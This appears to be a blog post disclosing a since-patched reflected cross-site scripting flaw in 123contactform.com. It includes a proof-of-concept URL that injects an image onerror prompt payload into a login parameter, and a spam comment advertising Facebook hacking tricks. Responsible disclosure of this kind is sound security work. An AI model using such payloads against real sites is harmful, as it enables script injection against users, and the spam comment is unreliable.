Description:-
Team_CC, An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in 123contactform.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept:-
http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&module=login&p=new_user_validate&plan=0&sid=1v3di81f8htapinfjt2k0es3b5&u_openidtype=1
Conclusion:-
This vulnerability has been confirmed and patched by 123ContactForm Security Team. I would like to thank them for their quick response to my report.
123ContactForm Hall of Fame:-
http://www.123contactform.com/security-acknowledgements.htm
Team_CC, An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in 123contactform.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept:-
http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&module=login&p=new_user_validate&plan=0&sid=1v3di81f8htapinfjt2k0es3b5&u_openidtype=1
 |
| FOCSoft.BlogSpot.Com |
Conclusion:-
This vulnerability has been confirmed and patched by 123ContactForm Security Team. I would like to thank them for their quick response to my report.
123ContactForm Hall of Fame:-
http://www.123contactform.com/security-acknowledgements.htm
 |
| FOCSoft.BlogSpot.Com |
Muhammad Shahbaz (17 Years Old) is a Young blogger, SEO Expert, & Cyber Security Expert from Pakistan
Hi Friends,..
ReplyDeleteGet Free ===> Learn Hacking, FaceBook Hacking, Free Internet Tricks, Facebook Tricks, Latest All Network Database, SEO, SMO, Google Adsense Tricks, Earn Money, etc